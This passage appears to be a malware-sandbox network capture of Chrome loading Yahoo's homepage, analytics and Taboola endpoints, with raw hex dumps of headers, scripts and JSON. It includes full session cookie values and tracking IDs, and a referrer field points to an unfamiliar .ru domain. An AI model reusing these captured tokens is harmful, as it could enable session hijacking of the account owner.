                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:03 UTC977INData Raw: 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 74 2e 70 72 6f 74 6f 74 79 70 65 29 2c 22 64 65 73 74 72 6f 79 22 2c 74 68 69 73 29 2e 63 61 6c 6c 28 74 68 69 73 29 3b 76 61 72 20 72 3d 74 68 69 73 2e 5f 73 74 61 74 65 2c 6e 3d 72 2e 65 6c 65 6d 65 6e 74 49 6e 73 74 61 6e 63 65 73 2c 69 3d 72 2e 65 6c 65 6d 65 6e 74 57 69 74 68 49 6e 74 65 6e 74 69 6f 6e 61 6c 56 69 65 77 65 64 49 6e 73 74 61 6e 63 65 73 3b 65 2e 63 6c 61 73 73 4c 69 73 74 2e 63 6f 6e 74 61 69 6e 73 28 22 77 61 66 65 72 2d 72 61 70 69 64 2d 6d 6f 64 75 6c 65 22 29 26 26 7a 28 65 2c 6e 2c 69 29 3b 76 61 72 20 61 3d 4e 28 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 28 22 77 61 66 65 72 2d 72 61 70 69 64 2d 6d 6f 64 75 6c 65 22 2c 6e 29 29 3b 61 2e 6c 65 6e 67
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: t.getPrototypeOf(t.prototype),"destroy",this).call(this);var r=this._state,n=r.elementInstances,i=r.elementWithIntentionalViewedInstances;e.classList.contains("wafer-rapid-module")&&z(e,n,i);var a=N(e.getElementsByClassName("wafer-rapid-module",n));a.leng


                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    132192.168.2.44989487.248.119.2524434464C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:03 UTC1126OUTPOST /fp_ms/_rcv/remote?ctrl=GamesMini&lang=en-US&m_id=react-wafer-games&m_mode=json&region=US&rid=1pa4ckpjflnfm&site=fp&apptype=default&instance_id=games&_evtSrc=deferLoad HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Host: www.yahoo.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Length: 211
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    content-type: application/json
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-webp: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Origin: https://www.yahoo.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referer: https://www.yahoo.com/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Cookie: A1=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A3=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A1S=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; cmp=t=1727716858&j=0&u=1YNN; gpp=DBAA; gpp_sid=-1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:03 UTC211OUTData Raw: 7b 22 62 75 63 6b 65 74 22 3a 22 39 30 30 2c 73 65 61 6d 6c 65 73 73 22 2c 22 63 6f 6e 66 69 67 22 3a 7b 22 78 68 72 50 61 74 68 50 72 65 66 69 78 22 3a 22 2f 66 70 5f 6d 73 2f 5f 72 63 76 2f 72 65 6d 6f 74 65 22 7d 2c 22 63 74 72 6c 22 3a 22 47 61 6d 65 73 4d 69 6e 69 22 2c 22 69 6e 73 74 61 6e 63 65 5f 69 64 22 3a 22 67 61 6d 65 73 22 2c 22 6d 5f 69 64 22 3a 22 72 65 61 63 74 2d 77 61 66 65 72 2d 67 61 6d 65 73 22 2c 22 6d 5f 6d 6f 64 65 22 3a 22 6a 73 6f 6e 22 2c 22 73 70 61 63 65 49 64 22 3a 32 30 32 33 35 33 38 30 37 35 2c 22 77 6f 65 69 64 22 3a 31 32 37 36 31 33 34 37 2c 22 74 69 6d 65 6f 75 74 22 3a 31 30 30 30 30 7d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: {"bucket":"900,seamless","config":{"xhrPathPrefix":"/fp_ms/_rcv/remote"},"ctrl":"GamesMini","instance_id":"games","m_id":"react-wafer-games","m_mode":"json","spaceId":2023538075,"woeid":12761347,"timeout":10000}
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:03 UTC728INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    expect-ct: max-age=31536000, report-uri="http://csp.yahoo.com/beacon/csp?src=yahoocom-expect-ct-report-only
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    referrer-policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    strict-transport-security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    content-type: application/json; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    status-code: 200
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-app-version: 1.0.37293
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-applet-version: 1.0.37293
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-instance-id: games
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-applet-id: react-wafer-games
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    date: Mon, 30 Sep 2024 17:21:03 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-envoy-upstream-service-time: 74
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-envoy-decorator-operation: tdv2-app-fp--mtls-production-ir2.frontpage-k8s-frontend.svc.yahoo.local:4080/*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Age: 0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:03 UTC762INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 66 72 61 6d 65 2d 61 6e 63 65 73 74 6f 72 73 20 27 73 65 6c 66 27 20 68 74 74 70 73 3a 2f 2f 2a 2e 62 75 69 6c 74 62 79 67 69 72 6c 73 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 72 69 76 61 6c 73 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 65 6e 67 61 64 67 65 74 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 69 6e 74 68 65 6b 6e 6f 77 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 61 75 74 6f 62 6c 6f 67 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 74 65 63 68 63 72 75 6e 63 68 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 79 61 68 6f 6f 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 61 6f 6c 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 68 75 66 66 69 6e 67 74 6f 6e 70 6f 73 74 2e 63
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: Content-Security-Policy: frame-ancestors 'self' https://*.builtbygirls.com https://*.rivals.com https://*.engadget.com https://*.intheknow.com https://*.autoblog.com https://*.techcrunch.com https://*.yahoo.com https://*.aol.com https://*.huffingtonpost.c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:03 UTC6INData Raw: 33 65 36 63 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 3e6c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:03 UTC1300INData Raw: 7b 22 61 73 73 65 74 73 22 3a 7b 22 63 73 73 22 3a 5b 7b 22 6c 6f 63 61 74 69 6f 6e 22 3a 22 74 6f 70 22 2c 22 76 61 6c 75 65 22 3a 22 2f 61 61 71 2f 63 70 72 6f 70 73 2f 63 6f 6c 6f 72 73 5f 31 2e 31 2e 32 37 2e 6d 69 6e 2e 63 73 73 22 2c 22 6e 61 6d 65 22 3a 22 63 75 73 74 6f 6d 2d 70 72 6f 70 65 72 74 69 65 73 22 2c 22 76 65 72 73 69 6f 6e 22 3a 22 31 2e 31 2e 32 37 22 7d 2c 7b 22 6c 6f 63 61 74 69 6f 6e 22 3a 22 74 6f 70 22 2c 22 76 61 6c 75 65 22 3a 22 2f 61 61 71 2f 66 70 2f 63 73 73 2f 72 65 61 63 74 2d 77 61 66 65 72 2d 67 61 6d 65 73 2e 47 61 6d 65 73 4d 69 6e 69 2e 61 74 6f 6d 69 63 2e 6c 74 72 2e 62 65 30 33 61 33 37 35 33 38 36 31 37 35 39 32 32 66 31 36 33 38 35 36 38 32 30 65 35 31 31 62 2e 6d 69 6e 2e 63 73 73 22 2c 22 6e 61 6d 65 22 3a 22
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: {"assets":{"css":[{"location":"top","value":"/aaq/cprops/colors_1.1.27.min.css","name":"custom-properties","version":"1.1.27"},{"location":"top","value":"/aaq/fp/css/react-wafer-games.GamesMini.atomic.ltr.be03a375386175922f163856820e511b.min.css","name":"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:03 UTC1300INData Raw: 28 73 29 20 42 64 72 73 28 32 70 78 29 20 42 64 65 6e 64 63 28 2d 2d 68 75 6c 6b 2d 70 61 6e 74 73 29 5c 22 3e 3c 2f 69 3e 3c 68 33 20 63 6c 61 73 73 3d 5c 22 54 64 28 6e 29 20 43 28 2d 2d 62 61 74 63 61 76 65 29 20 4d 62 28 30 29 20 46 77 28 36 30 30 29 20 46 7a 28 31 34 70 78 29 5c 22 3e 50 6c 61 79 20 67 61 6d 65 73 20 66 6f 72 20 66 72 65 65 20 6f 6e 20 59 61 68 6f 6f 3c 2f 68 33 3e 3c 2f 64 69 76 3e 3c 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 5c 22 67 61 6d 65 73 2d 74 61 62 73 2d 73 63 72 6f 6c 6c 76 69 65 77 20 77 61 66 65 72 2d 73 63 72 6f 6c 6c 76 69 65 77 20 50 6f 73 28 72 29 20 4d 78 28 2d 32 30 70 78 29 20 54 61 28 63 29 20 4f 76 28 68 29 5c 22 20 64 61 74 61 2d 77 66 2d 62 65 68 61 76 69 6f 72 3d 5c 22
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: (s) Bdrs(2px) Bdendc(--hulk-pants)\"></i><h3 class=\"Td(n) C(--batcave) Mb(0) Fw(600) Fz(14px)\">Play games for free on Yahoo</h3></div><div></div></div><div class=\"games-tabs-scrollview wafer-scrollview Pos(r) Mx(-20px) Ta(c) Ov(h)\" data-wf-behavior=\"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:03 UTC1300INData Raw: 6e 64 28 30 70 78 29 3a 6c 63 20 77 61 66 65 72 2d 66 65 74 63 68 5c 22 20 64 61 74 61 2d 79 6c 6b 3d 5c 22 69 74 63 3a 31 3b 73 65 63 3a 61 70 70 2d 67 61 6d 65 73 3b 63 70 6f 73 3a 31 3b 65 6c 6d 3a 74 61 62 3b 73 6c 6b 3a 57 6f 72 64 3b 5c 22 20 69 64 3d 5c 22 67 61 6d 65 73 2d 74 61 62 2d 31 5c 22 20 72 6f 6c 65 3d 5c 22 74 61 62 5c 22 20 64 61 74 61 2d 77 66 2d 74 61 72 67 65 74 3d 5c 22 23 67 61 6d 65 73 2d 70 61 6e 65 6c 2d 31 5c 22 20 64 61 74 61 2d 77 66 2d 74 72 69 67 67 65 72 3d 5c 22 74 61 62 41 63 74 69 76 61 74 65 5c 22 20 64 61 74 61 2d 77 66 2d 75 72 6c 3d 5c 22 2f 66 70 5f 6d 73 2f 5f 72 63 76 2f 72 65 6d 6f 74 65 5c 22 20 64 61 74 61 2d 77 66 2d 62 6f 64 79 3d 5c 22 7b 26 71 75 6f 74 3b 63 74 72 6c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: nd(0px):lc wafer-fetch\" data-ylk=\"itc:1;sec:app-games;cpos:1;elm:tab;slk:Word;\" id=\"games-tab-1\" role=\"tab\" data-wf-target=\"#games-panel-1\" data-wf-trigger=\"tabActivate\" data-wf-url=\"/fp_ms/_rcv/remote\" data-wf-body=\"{&quot;ctrl&quot;:&quot;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:03 UTC1300INData Raw: 67 6f 72 79 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 42 6f 61 72 64 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 73 6c 6f 74 50 6f 73 69 74 69 6f 6e 26 71 75 6f 74 3b 3a 31 2c 26 71 75 6f 74 3b 78 68 72 50 61 74 68 50 72 65 66 69 78 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 2f 66 70 5f 6d 73 2f 5f 72 63 76 2f 72 65 6d 6f 74 65 26 71 75 6f 74 3b 7d 7d 5c 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 5c 22 45 6c 6c 20 4d 61 77 28 31 36 63 68 29 20 50 65 28 6e 29 20 44 28 62 29 20 50 79 28 31 30 70 78 29 20 46 77 28 35 30 30 29 20 46 7a 28 2d 2d 66 6f 6e 74 2d 31 31 70 78 29 20 74 61 62 41 63 74 69 76 65 5f 42 78 73 68 28 24 74 61 62 73 42 74 6e 53 68 61 64 6f 77 29 20 42 67 63 28 2d 2d 6d 61 72 73 68 6d 61 6c 6c 6f 77 29 20 42 64 72 73 28 33 32 70 78 29 20 43 28 2d 2d 62
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: gory&quot;:&quot;Board&quot;,&quot;slotPosition&quot;:1,&quot;xhrPathPrefix&quot;:&quot;/fp_ms/_rcv/remote&quot;}}\"><span class=\"Ell Maw(16ch) Pe(n) D(b) Py(10px) Fw(500) Fz(--font-11px) tabActive_Bxsh($tabsBtnShadow) Bgc(--marshmallow) Bdrs(32px) C(--b
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:03 UTC1300INData Raw: 68 28 31 72 65 6d 29 20 57 68 73 28 6e 77 29 20 50 28 30 29 20 4d 65 6e 64 28 31 30 70 78 29 20 4d 65 6e 64 28 30 70 78 29 3a 6c 63 20 77 61 66 65 72 2d 66 65 74 63 68 5c 22 20 64 61 74 61 2d 79 6c 6b 3d 5c 22 69 74 63 3a 31 3b 73 65 63 3a 61 70 70 2d 67 61 6d 65 73 3b 63 70 6f 73 3a 31 3b 65 6c 6d 3a 74 61 62 3b 73 6c 6b 3a 43 61 73 69 6e 6f 3b 5c 22 20 69 64 3d 5c 22 67 61 6d 65 73 2d 74 61 62 2d 34 5c 22 20 72 6f 6c 65 3d 5c 22 74 61 62 5c 22 20 64 61 74 61 2d 77 66 2d 74 61 72 67 65 74 3d 5c 22 23 67 61 6d 65 73 2d 70 61 6e 65 6c 2d 34 5c 22 20 64 61 74 61 2d 77 66 2d 74 72 69 67 67 65 72 3d 5c 22 74 61 62 41 63 74 69 76 61 74 65 5c 22 20 64 61 74 61 2d 77 66 2d 75 72 6c 3d 5c 22 2f 66 70 5f 6d 73 2f 5f 72 63 76 2f 72 65 6d 6f 74 65 5c 22 20 64 61 74
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: h(1rem) Whs(nw) P(0) Mend(10px) Mend(0px):lc wafer-fetch\" data-ylk=\"itc:1;sec:app-games;cpos:1;elm:tab;slk:Casino;\" id=\"games-tab-4\" role=\"tab\" data-wf-target=\"#games-panel-4\" data-wf-trigger=\"tabActivate\" data-wf-url=\"/fp_ms/_rcv/remote\" dat
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:03 UTC1300INData Raw: 75 6f 74 3b 2c 26 71 75 6f 74 3b 63 6f 6e 66 69 67 26 71 75 6f 74 3b 3a 7b 26 71 75 6f 74 3b 66 69 6c 74 65 72 43 61 74 65 67 6f 72 79 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 50 75 7a 7a 6c 65 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 73 6c 6f 74 50 6f 73 69 74 69 6f 6e 26 71 75 6f 74 3b 3a 31 2c 26 71 75 6f 74 3b 78 68 72 50 61 74 68 50 72 65 66 69 78 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 2f 66 70 5f 6d 73 2f 5f 72 63 76 2f 72 65 6d 6f 74 65 26 71 75 6f 74 3b 7d 7d 5c 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 5c 22 45 6c 6c 20 4d 61 77 28 31 36 63 68 29 20 50 65 28 6e 29 20 44 28 62 29 20 50 79 28 31 30 70 78 29 20 46 77 28 35 30 30 29 20 46 7a 28 2d 2d 66 6f 6e 74 2d 31 31 70 78 29 20 74 61 62 41 63 74 69 76 65 5f 42 78 73 68 28 24 74 61 62 73 42 74 6e 53
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: uot;,&quot;config&quot;:{&quot;filterCategory&quot;:&quot;Puzzle&quot;,&quot;slotPosition&quot;:1,&quot;xhrPathPrefix&quot;:&quot;/fp_ms/_rcv/remote&quot;}}\"><span class=\"Ell Maw(16ch) Pe(n) D(b) Py(10px) Fw(500) Fz(--font-11px) tabActive_Bxsh($tabsBtnS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:03 UTC1300INData Raw: 20 42 64 72 73 62 73 74 61 72 74 28 31 30 30 25 29 20 42 64 72 73 74 73 74 61 72 74 28 31 30 30 25 29 5c 22 20 64 61 74 61 2d 79 6c 6b 3d 5c 22 69 74 63 3a 31 3b 73 65 63 3a 61 70 70 2d 67 61 6d 65 73 3b 63 70 6f 73 3a 31 3b 65 6c 6d 3a 61 72 72 6f 77 3b 73 6c 6b 3a 6e 65 78 74 3b 5c 22 3e 3c 73 76 67 20 63 6c 61 73 73 3d 5c 22 50 6f 73 28 72 29 20 45 6e 64 28 35 70 78 29 20 50 65 28 6e 29 20 43 75 72 28 70 29 5c 22 20 77 69 64 74 68 3d 5c 22 31 30 5c 22 20 73 74 79 6c 65 3d 5c 22 66 69 6c 6c 3a 63 75 72 72 65 6e 74 43 6f 6c 6f 72 3b 73 74 72 6f 6b 65 3a 63 75 72 72 65 6e 74 43 6f 6c 6f 72 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 30 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 6f 74 74 6f 6d 5c 22 20 68 65 69 67 68 74 3d 5c 22 31 30 5c 22 20 76 69
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: Bdrsbstart(100%) Bdrststart(100%)\" data-ylk=\"itc:1;sec:app-games;cpos:1;elm:arrow;slk:next;\"><svg class=\"Pos(r) End(5px) Pe(n) Cur(p)\" width=\"10\" style=\"fill:currentColor;stroke:currentColor;stroke-width:0;vertical-align:bottom\" height=\"10\" vi


                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    133192.168.2.4498963.75.62.374434464C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:04 UTC1069OUTGET /ups/58824/sync?format=json&gdpr=false&gdpr_consent=&gpp=DBAA&gpp_sid=-1&us_privacy=1YNN HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Host: ups.analytics.yahoo.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept: application/json
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Origin: https://www.yahoo.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referer: https://www.yahoo.com/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Cookie: A1=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A3=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A1S=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; cmp=t=1727716858&j=0&u=1YNN; gpp=DBAA; gpp_sid=-1; IDSYNC=19cw~2kzt; axids=gam=y-PMOp3thE2uLhyy8QFBkAKGqNgLvzneG4~A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:04 UTC551INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Date: Mon, 30 Sep 2024 17:21:04 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: https://www.yahoo.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: IDSYNC="19cw~2kzt:19e0~2kzt";Version=1;Domain=.analytics.yahoo.com;Path=/;Max-Age=31536000;Expires=Tue, 30-Sep-2025 17:21:04 GMT;Secure;SameSite=None
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Age: 0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Server: ATS/9.1.10.137
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:04 UTC4INData Raw: 33 63 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 3c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:04 UTC60INData Raw: 7b 22 61 78 69 64 22 3a 20 22 65 53 31 4c 5a 7a 64 52 4f 47 31 47 52 54 4a 31 52 56 5a 33 4d 57 5a 32 57 57 74 31 62 54 52 42 64 56 41 78 4f 45 6c 42 53 79 35 44 62 6e 35 42 22 7d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: {"axid": "eS1LZzdROG1GRTJ1RVZ3MWZ2WWt1bTRBdVAxOElBSy5Dbn5B"}
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:04 UTC5INData Raw: 0d 0a 30 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:04 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii:


                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    134192.168.2.449905151.101.193.444434464C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:04 UTC2632OUTPOST /yahoo-home/trc/3/json?llvl=2&tim=13%3A21%3A03.493&lti=trecs&pubit=n&t=1&data=%7B%22cmps%22%3A0%2C%22ga%22%3Afalse%2C%22cex%22%3A%22false%22%2C%22id%22%3A%2272148%22%2C%22sd%22%3A%22%22%2C%22ui%22%3A%22%22%2C%22ii%22%3A%22_homepage_%22%2C%22it%22%3A%22home%22%2C%22vi%22%3A1727716863493%2C%22cv%22%3A%2220240929-12-RELEASE%22%2C%22uiv%22%3A%22default%22%2C%22u%22%3A%22https%3A%2F%2Fwww.yahoo.com%2F%22%2C%22qs%22%3A%22%22%2C%22bv%22%3A%220%22%2C%22btv%22%3A%220%22%2C%22ul%22%3A%5B%22en-US%22%2C%22en%22%5D%2C%22ccpa_ps%22%3A%221YNN%22%2C%22cos%22%3A%223g%22%2C%22e%22%3A%22https%3A%2F%2Fhfj.rontishet.ru%2F%22%2C%22bu%22%3A%22https%3A%2F%2Fwww.yahoo.com%2F%22%2C%22vpi%22%3A%22%2F%22%2C%22bad%22%3A-1%2C%22sw%22%3A1280%2C%22sh%22%3A984%2C%22bw%22%3A1280%2C%22bh%22%3A907%2C%22dw%22%3A1263%2C%22dh%22%3A5318%2C%22sde%22%3A%221.000%22%2C%22lt%22%3A%22trecs%22%2C%22nsid%22%3A%22yahooweb-network%22%2C%22pblob%22%3A%22cobrand%3Anone%3Bcolo%3Abf1%3Bdevice%3Adesktop%3Blang%3Aen-US%3Blu%3A0%3Bpt%3Ahome%3Bregion%3AUS%3Bsit [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Host: trc.taboola.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/plain
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept: */*
